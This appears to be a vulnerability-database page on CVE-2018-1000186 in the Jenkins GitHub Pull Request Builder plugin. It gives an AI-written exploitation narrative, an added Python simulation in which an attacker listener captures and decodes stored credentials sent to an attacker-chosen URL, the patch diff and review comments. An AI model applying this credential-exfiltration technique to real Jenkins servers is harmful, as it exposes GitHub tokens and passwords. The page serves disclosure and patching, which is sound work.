CVE-2018-1000186
Description
Jenkins GitHub Pull Request Builder Plugin ≤1.41.0 exposes credentials by letting attackers with Overall/Read access connect to attacker-chosen URLs using stolen credential IDs.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Jenkins GitHub Pull Request Builder Plugin (ghprb-plugin) version 1.41.0 and older contains a sensitive information exposure vulnerability in GhprbGitHubAuth.java. The form validation methods behind the plugin's configuration form, doCreateApiToken, doCheckRepoAccess and doTestGithubAccess, take a caller-supplied serverAPIUrl and credentialsId as query parameters: doCheckRepoAccess and doTestGithubAccess build a GitHub API client from the credential identified by credentialsId and connect to serverAPIUrl with it, and doCreateApiToken connects to serverAPIUrl with the username and password supplied in the request. None of them checked any permission beyond the Overall/Read access needed to reach the endpoint at all, so any user with that minimal permission could make Jenkins connect to an attacker-chosen URL using a credential ID obtained through another method (credential IDs are frequently human-chosen, so guessing is realistic). The methods also accepted GET requests rather than requiring POST, so the same request could be delivered through cross-site request forgery (CSRF) by a logged-in user's browser [1][2][3].
Exploitation
An attacker needs Overall/Read access to Jenkins and a valid credential ID (obtained through another information disclosure, or simply guessed). With those, the attacker requests the form validation endpoint directly, setting serverAPIUrl to an attacker-controlled server and credentialsId to the target credential; no victim interaction is needed, because the missing permission check means the attacker's own Overall/Read session is enough. Jenkins resolves the stored credential, builds a GitHub API client with it and authenticates to the attacker's server, which only has to log the incoming request, authentication header included, to obtain the secret [2][3]. Because the methods also accepted GET requests, an attacker who lacks Overall/Read can instead use CSRF: a Jenkins user who is logged in and visits an attacker-controlled page triggers the same request with their own session. No special network position is required beyond being able to deliver the request to the Jenkins instance, either directly or via such a user [2].
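The two-party mechanism described in the Vulnerability and Exploitation sections, as an added Python simulation (this is not code from the ghprb plugin, Jenkins, or the advisory). One function stands in for the unpatched doTestGithubAccess handler, which resolves a stored credential by ID and connects to whatever serverAPIUrl the caller supplied; a second stands in for the patched handler, modelling the @POST rejection as HTTP 405 and the failed Jenkins.ADMINISTER check as HTTP 403 (both assumed from Stapler and Jenkins behaviour, not from the page); a loopback HTTP listener plays the attacker's server and records the Authorization header it receives. The credential store, the secrets, the `/user` request path and the "token"/"Basic" header formats are constructed for the demo; nothing leaves localhost.

```python
"""Added example: simulation of credential exfiltration via an unprotected
Jenkins form-validation endpoint (not code from ghprb-plugin or Jenkins)."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample credential store: credential ID -> (kind, secret).
# Jenkins credential IDs are often human-chosen, which is why "credential ID
# obtained through another method" is a low bar for an attacker.
CREDENTIAL_STORE = {
    "github-token": ("token", "ghp_EXAMPLE_NOT_A_REAL_TOKEN"),
    "github-basic": ("basic", "ci-bot:s3cr3t-password"),
}


class CaptureHandler(BaseHTTPRequestHandler):
    """Attacker side: record (path, Authorization header) and answer 401."""
    captured = []

    def do_GET(self):
        CaptureHandler.captured.append((self.path, self.headers.get("Authorization")))
        self.send_response(401)
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


def start_listener():
    """Bind the attacker listener on an ephemeral loopback port."""
    server = HTTPServer(("127.0.0.1", 0), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def authorization_header(credentials_id):
    """How a GitHub client would present the stored credential (assumed formats)."""
    kind, secret = CREDENTIAL_STORE[credentials_id]
    if kind == "token":
        return "token " + secret
    return "Basic " + base64.b64encode(secret.encode()).decode()


def vulnerable_test_github_access(server_api_url, credentials_id):
    """Stand-in for doTestGithubAccess() before the fix: no permission check,
    any HTTP method, and the caller decides where the credential is sent."""
    req = urllib.request.Request(
        server_api_url.rstrip("/") + "/user",  # hypothetical API call path
        headers={"Authorization": authorization_header(credentials_id)},
    )
    try:
        urllib.request.urlopen(req, timeout=5).close()
        return "ok"
    except urllib.error.HTTPError as exc:
        return "error %d" % exc.code  # would become FormValidation.error(...)


def hardened_test_github_access(server_api_url, credentials_id, caller_is_admin, method):
    """Same handler after the fix: @POST rejects GET (405) before the body runs,
    and checkPermission(Jenkins.ADMINISTER) rejects non-admins (403)."""
    if method != "POST":
        return 405
    if not caller_is_admin:
        return 403
    vulnerable_test_github_access(server_api_url, credentials_id)
    return 200


def extract_secret(auth_header):
    """Attacker side: recover the secret from a captured Authorization header."""
    scheme, _, value = auth_header.partition(" ")
    if scheme.lower() == "basic":
        return base64.b64decode(value).decode()
    return value


def run_demo():
    """Drive both paths. Returns (secrets leaked by the unpatched handler,
    status codes the patched handler returns to a non-admin GET and POST)."""
    server, port = start_listener()
    attacker_url = "http://127.0.0.1:%d" % port
    CaptureHandler.captured.clear()
    try:
        for cid in ("github-token", "github-basic"):
            vulnerable_test_github_access(attacker_url, cid)
        leaked = [extract_secret(auth) for _, auth in CaptureHandler.captured if auth]
        blocked = (
            hardened_test_github_access(attacker_url, "github-token", False, "GET"),
            hardened_test_github_access(attacker_url, "github-token", False, "POST"),
        )
    finally:
        server.shutdown()
        server.server_close()
    return leaked, blocked


if __name__ == "__main__":
    print(run_demo())
```

Running `run_demo()` shows both stored secrets arriving at the attacker listener through the unpatched path, while the patched path never opens a connection for a non-admin caller: the GET is refused before the method body runs and the POST is refused by the permission check. The order of the two checks matters in the real fix as well, since the @POST rejection happens in Stapler before any plugin code executes.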
Impact
Successful exploitation lets the attacker capture credentials stored in Jenkins, specifically those usable by the plugin for GitHub or GitHub Enterprise access (API tokens or username/password pairs). The direct impact is exposure of those secrets; what follows depends on what they grant: unauthorized access to repositories on the external system, or privilege escalation within Jenkins if the same credential is also accepted there [2][3]. The advisory rates the issue medium severity (CVSS 4.3) [2].
Mitigation
The vulnerability is fixed in version 1.42.0 of the GitHub Pull Request Builder Plugin [4]. The fix annotates doCreateApiToken, doCheckRepoAccess and doTestGithubAccess with @POST, so a GET request is rejected before the method body runs, and adds Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER) to each of them, so only administrators, who can already read stored credentials, can trigger the outbound connection; the remaining changes (dropping the URISyntaxException declaration from doFillCredentialsIdItems, a private modifier, diamond operators) are cleanups [4]. The plugin is deprecated and replaced by the GitHub Branch Source Plugin; users are strongly advised to migrate [1]. No workaround is published for unpatched versions; since Overall/Read is the only precondition, restricting that permission to trusted accounts until the update is applied reduces the exposed surface but does not remove it. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.jenkins-ci.plugins:ghprb (Maven) | < 1.42.0 | 1.42.0 |
Affected products
Patches (1)
1 file changed · +17 −7
src/main/java/org/jenkinsci/plugins/ghprb/GhprbGitHubAuth.java+17 −7 modified@@ -18,6 +18,7 @@ import hudson.util.FormValidation; import hudson.util.ListBoxModel; import hudson.util.Secret; +import jenkins.model.Jenkins; import org.apache.commons.codec.binary.Hex; import org.apache.commons.lang.StringUtils; import org.jenkinsci.plugins.plaincredentials.StringCredentials; @@ -32,11 +33,11 @@ import org.kohsuke.stapler.DataBoundConstructor; import org.kohsuke.stapler.QueryParameter; import org.kohsuke.stapler.export.Exported; +import org.kohsuke.stapler.verb.POST; import javax.crypto.Mac; import javax.crypto.spec.SecretKeySpec; import java.io.IOException; -import java.net.URISyntaxException; import java.nio.charset.Charset; import java.util.ArrayList; import java.util.Arrays; @@ -57,7 +58,7 @@ public class GhprbGitHubAuth extends AbstractDescribableImpl<GhprbGitHubAuth> { private static final int SHA1_PREFIX_LENGTH = 5; - static final int INITIAL_CAPACITY = 3; + private static final int INITIAL_CAPACITY = 3; private final String serverAPIUrl; @@ -241,16 +242,15 @@ public String getDisplayName() { * @param serverAPIUrl the github api server url. * @param credentialsId the credentialsId from the credentials plugin * @return list box model. - * @throws URISyntaxException If the url is bad */ public ListBoxModel doFillCredentialsIdItems( @AncestorInPath Item context, @QueryParameter String serverAPIUrl, @QueryParameter String credentialsId - ) throws URISyntaxException { + ) { List<DomainRequirement> domainRequirements = URIRequirementBuilder.fromUri(serverAPIUrl).build(); - List<CredentialsMatcher> matchers = new ArrayList<CredentialsMatcher>(INITIAL_CAPACITY); + List<CredentialsMatcher> matchers = new ArrayList<>(INITIAL_CAPACITY); if (!StringUtils.isEmpty(credentialsId)) { matchers.add(0, CredentialsMatchers.withId(credentialsId)); } 
@@ -273,14 +273,16 @@ public ListBoxModel doFillCredentialsIdItems( ); } - + @POST public FormValidation doCreateApiToken( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId, @QueryParameter("username") final String username, @QueryParameter("password") final String password) { try { + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + GitHubBuilder builder = new GitHubBuilder() .withEndpoint(serverAPIUrl) .withConnector(new HttpConnectorWithJenkinsProxy()); @@ -326,10 +328,14 @@ public FormValidation doCheckServerAPIUrl(@QueryParameter String value) { return FormValidation.warning("GitHub API URI is \"https://api.github.com\". GitHub Enterprise API URL ends with \"/api/v3\""); } + @POST public FormValidation doCheckRepoAccess( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId, @QueryParameter("repo") final String repo) { + + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + try { GitHubBuilder builder = getBuilder(null, serverAPIUrl, credentialsId); if (builder == null) { @@ -339,7 +345,7 @@ public FormValidation doCheckRepoAccess( GHRepository repository = gh.getRepository(repo); StringBuilder sb = new StringBuilder(); sb.append("User has access to: "); - List<String> permissions = new ArrayList<String>(INITIAL_CAPACITY); + List<String> permissions = new ArrayList<>(INITIAL_CAPACITY); if (repository.hasAdminAccess()) { permissions.add("Admin"); } @@ -357,9 +363,13 @@ public FormValidation doCheckRepoAccess( } } + @POST public FormValidation doTestGithubAccess( @QueryParameter("serverAPIUrl") final String serverAPIUrl, @QueryParameter("credentialsId") final String credentialsId) { + + Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER); + try { GitHubBuilder builder = getBuilder(null, serverAPIUrl, credentialsId); if (builder == null) {
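Review bot: the `@@ -57,7 +58,7 @@` hunk (`static final` to `private static final` for INITIAL_CAPACITY), together with the diamond-operator changes and the dropped `throws URISyntaxException`, is unrelated cleanup inside a security fix; it enlarges the diff that downstream users have to review and backport. Suggest keeping the fix commit to the three `@POST` and `checkPermission` additions and landing the tidy-ups in a separate commit.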
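Review bot: `doFillCredentialsIdItems` in the `@@ -241,16 +242,15 @@` hunk still has no permission check; only its `throws` clause and the `ArrayList` generics changed. It already receives `@AncestorInPath Item context`, so the usual guard fits without further plumbing: `if (context == null ? !Jenkins.getInstance().hasPermission(Jenkins.ADMINISTER) : !context.hasPermission(Item.CONFIGURE)) return new StandardListBoxModel().includeCurrentValue(credentialsId);` (StandardListBoxModel from the credentials plugin). If the model is built under ACL.SYSTEM, as is usual for these dropdowns, any Overall/Read user can otherwise enumerate the credential IDs matching `serverAPIUrl`, which is exactly the "credential ID obtained through another method" that the three patched methods now assume the caller does not have.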
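Review bot: in the `@@ -273,14 +273,16 @@` hunk, `Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);` is placed inside the `try {` of `doCreateApiToken`, unlike the two later hunks where it precedes `try`. If the `catch` below is broad, the AccessDeniedException thrown for a non-admin caller is turned into a `FormValidation` error message returned with HTTP 200 instead of propagating as a 403, which still blocks the connection but hides the denial from logs and makes the check easy to break in a later refactor. Move the line above `try {`, matching `doCheckRepoAccess` and `doTestGithubAccess`.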
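Review bot: `Jenkins.ADMINISTER` in the `@@ -326,10 +328,14 @@` hunk is a coarse gate for a per-job "check repo access" button: a user who can configure the job but is not an administrator now gets a 403 from the validation while still being able to save the same `serverAPIUrl`/`credentialsId`. If the goal is only to exclude Overall/Read users, take `@AncestorInPath Item context` as `doFillCredentialsIdItems` already does and check `context.checkPermission(Item.CONFIGURE)`, falling back to `Jenkins.ADMINISTER` when `context` is null; that is the pattern Jenkins core uses for credential-backed form validation. Separately, `Jenkins.getInstance()` is deprecated in favour of `Jenkins.get()` on cores 2.98 and newer; switch if the plugin's core baseline allows it.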
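Review bot: the `@@ -357,9 +363,13 @@` hunk is the third verbatim copy of `@POST` plus `Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);`, and none of the three methods' Javadoc mentions the new requirement. Factor the check into one private helper so the three stay in step, and add a one-line Javadoc note that the method opens an outbound connection with a stored credential to a caller-supplied URL and is therefore restricted to administrators; without that rationale recorded, the next contributor has nothing to tell them the permission must not be relaxed.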
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (5)
- github.com/advisories/GHSA-92rv-mvmj-47qh (GHSA, advisory)
- nvd.nist.gov/vuln/detail/CVE-2018-1000186 (GHSA, advisory)
- github.com/jenkinsci/ghprb-plugin/commit/e78ee24f7056b8507992ef17a9bb74a1a31d8c11 (GHSA, web)
- jenkins.io/security/advisory/2018-06-04/ (GHSA, x_refsource_CONFIRM, web)
- mvnrepository.com/artifact/org.jenkins-ci.plugins/ghprb (GHSA, web)
News mentions
No linked articles in our index yet.